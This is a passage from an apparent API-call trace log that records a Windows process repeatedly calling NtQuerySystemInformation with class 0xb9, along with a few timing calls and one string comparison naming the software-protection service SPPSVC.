(SystemInformationClass=0xb9, SystemInformation=0xc751dfe6f0, Length=0x28, ResultLength=0x0) [0210.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6f0, Length=0x28, ResultLength=0x0) [0210.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6f0, Length=0x28, ResultLength=0x0) [0210.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6f0, Length=0x28, ResultLength=0x0) [0210.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe760, Length=0x28, ResultLength=0x0) [0210.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe8c0, Length=0x38, ResultLength=0x0) [0210.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7e0, Length=0x28, ResultLength=0x0) [0210.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7e0, Length=0x28, ResultLength=0x0) [0210.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe8c0, Length=0x38, ResultLength=0x0) [0210.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe740, Length=0x20, ResultLength=0x0) [0210.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6c0, Length=0x20, ResultLength=0x0) [0210.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6c0, Length=0x20, ResultLength=0x0) [0210.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6c0, Length=0x20, ResultLength=0x0) [0210.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe8c0, Length=0x38, ResultLength=0x0) [0210.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe740, Length=0x20, ResultLength=0x0) [0210.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6d0, Length=0x20, ResultLength=0x0) [0210.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6d0, Length=0x20, ResultLength=0x0) [0210.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.024] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0210.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe978, Length=0x50, ResultLength=0x0) [0210.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe8a0, Length=0x38, ResultLength=0x0) [0210.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6d0, Length=0x28, ResultLength=0x0) [0210.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6d0, Length=0x28, ResultLength=0x0) [0210.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6d0, Length=0x28, ResultLength=0x0) [0210.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe740, Length=0x28, ResultLength=0x0) [0210.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe8a0, Length=0x38, ResultLength=0x0) [0210.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7c0, Length=0x28, ResultLength=0x0) [0210.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7c0, Length=0x28, ResultLength=0x0) [0210.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe8a0, Length=0x38, ResultLength=0x0) [0210.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe720, Length=0x20, ResultLength=0x0) [0210.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6a0, Length=0x20, ResultLength=0x0) [0210.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6a0, Length=0x20, ResultLength=0x0) [0210.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6a0, Length=0x20, ResultLength=0x0) [0210.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe8a0, Length=0x38, ResultLength=0x0) [0210.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe720, Length=0x20, ResultLength=0x0) [0210.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6b0, Length=0x20, ResultLength=0x0) [0210.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6b0, Length=0x20, ResultLength=0x0) [0210.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.032] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc751dfeb10 | out: lpSystemTimeAsFileTime=0xc751dfeb10*(dwLowDateTime=0xde75a507, dwHighDateTime=0x1d5fb6e)) [0210.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfeb30, Length=0x50, ResultLength=0x0) [0210.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfeb30, Length=0x50, ResultLength=0x0) [0210.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfeb30, Length=0x50, ResultLength=0x0) [0210.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea20, Length=0x50, ResultLength=0x0) [0210.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea20, Length=0x50, ResultLength=0x0) [0210.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea20, Length=0x50, ResultLength=0x0) [0210.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea20, Length=0x50, ResultLength=0x0) [0210.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe950, Length=0x38, ResultLength=0x0) [0210.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe780, Length=0x28, ResultLength=0x0) [0210.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe780, Length=0x28, ResultLength=0x0) [0210.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe780, Length=0x28, ResultLength=0x0) [0210.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7f0, Length=0x28, ResultLength=0x0) [0210.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe950, Length=0x38, ResultLength=0x0) [0210.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe870, Length=0x28, ResultLength=0x0) [0210.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe870, Length=0x28, ResultLength=0x0) [0210.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe950, Length=0x38, ResultLength=0x0) [0210.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7d0, Length=0x20, ResultLength=0x0) [0210.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe750, Length=0x20, ResultLength=0x0) [0210.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe750, Length=0x20, ResultLength=0x0) [0210.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe750, Length=0x20, ResultLength=0x0) [0210.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe950, Length=0x38, ResultLength=0x0) [0210.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7d0, Length=0x20, ResultLength=0x0) [0210.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe760, Length=0x20, ResultLength=0x0) [0210.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe760, Length=0x20, ResultLength=0x0) [0210.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfec60, Length=0x50, ResultLength=0x0) [0210.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfec60, Length=0x50, ResultLength=0x0) [0210.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfec60, Length=0x50, ResultLength=0x0) [0210.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfeaf0, Length=0x28, ResultLength=0x0) [0210.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea08, Length=0x50, ResultLength=0x0) [0210.043] GetTickCount () returned 0x11752e5 [0210.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe8d8, Length=0x58, ResultLength=0x0) [0210.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7f0, Length=0x38, ResultLength=0x0) [0210.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe620, Length=0x28, ResultLength=0x0) [0210.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe620, Length=0x28, ResultLength=0x0) [0210.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe620, Length=0x28, ResultLength=0x0) [0210.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe620, Length=0x28, ResultLength=0x0) [0210.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe690, Length=0x28, ResultLength=0x0) [0210.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7f0, Length=0x38, ResultLength=0x0) [0210.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe710, Length=0x28, ResultLength=0x0) [0210.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe710, Length=0x28, ResultLength=0x0) [0210.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7f0, Length=0x38, ResultLength=0x0) [0210.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe670, Length=0x20, ResultLength=0x0) [0210.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5f0, Length=0x20, ResultLength=0x0) [0210.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5f0, Length=0x20, ResultLength=0x0) [0210.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5f0, Length=0x20, ResultLength=0x0) [0210.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7f0, Length=0x38, ResultLength=0x0) [0210.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe670, Length=0x20, ResultLength=0x0) [0210.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe600, Length=0x20, ResultLength=0x0) [0210.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe600, Length=0x20, ResultLength=0x0) [0210.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe8d8, Length=0x58, ResultLength=0x0) [0210.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7b0, Length=0x38, ResultLength=0x0) [0210.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 